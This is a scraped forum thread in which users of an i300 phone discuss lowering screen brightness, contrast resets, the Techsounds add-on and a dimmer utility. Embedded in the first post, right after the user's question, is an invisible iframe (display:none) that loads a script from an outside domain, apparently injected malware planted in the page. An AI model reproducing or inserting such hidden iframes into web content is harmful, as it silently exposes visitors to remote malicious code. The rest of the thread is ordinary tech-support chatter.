+ Reply to Thread

Thread: Brightness

Lightbulb Brightness

Is there anyway to lower the brightness of the screen? It wouldn't be so hard on my eyes at night when I'm trying to work while my girlfriend is asleep. Maybe even a hack?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Administrator

Arrow

i have not heard of such a hack but anything is possible. as it stands now, you can only adjuat the contrast.

Marc is correct. The contrast control should be the perfect remedy for you. I tend to adjust mine while working in the dark.

i haved searched but could not find anyone else talking about this problem with my contrast...whatever position i put it at, as soon as the screen turns off, when it comes back on, the contrast goes rights back to the default setting.???

Administrator

Arrow

do you tap "done" when yuo exit the contrast mode?

have yout done the reset dance:

soft, warm, cold?

of course i tap done, but never reset afterwards- wouldnt that be counterproductive?

Administrator

Arrow

i didnt mean to belittle your intelligence, i was just making sure...

i didnt mean to do a reset afterwards, i was asking if you have done any type of reset to see if it could bring the phone out of any software issue that may be hindering the contrast slider.

There is a hack at Palmgear. Don't know if it will work with the i300, though. You might want to check it out.

Energy Dimmer 1.3

Drammau

I've been having the same brightness problem, albeit intermittenly.

For me atleast, its specific to having Techsounds activated. Wehn turning on the phone (regardless of what button pushed, or the phone activating due to incoming call/alarm) the contrast resets itself to the default, regardless of how many times I set it back to max contrast.

With Techsounds disabled through Hackmaster, the phone no longer exhibits this quirk. I spoke to the Techsound developer, and he shrugged it off as a bug in the phone.

What has worked for me for about a week at a time (or until the I300 decides it wants the contrast back to default) is a quick removal and replacement of the battery (soft reset having had no effect).

Hope this helps.

Unhappy Dont work

I just tried the dimmer util. when you do a soft bioot an dget intothe x master to activate it .... it just gives a message that this does not work with your palm.......

ALIBABA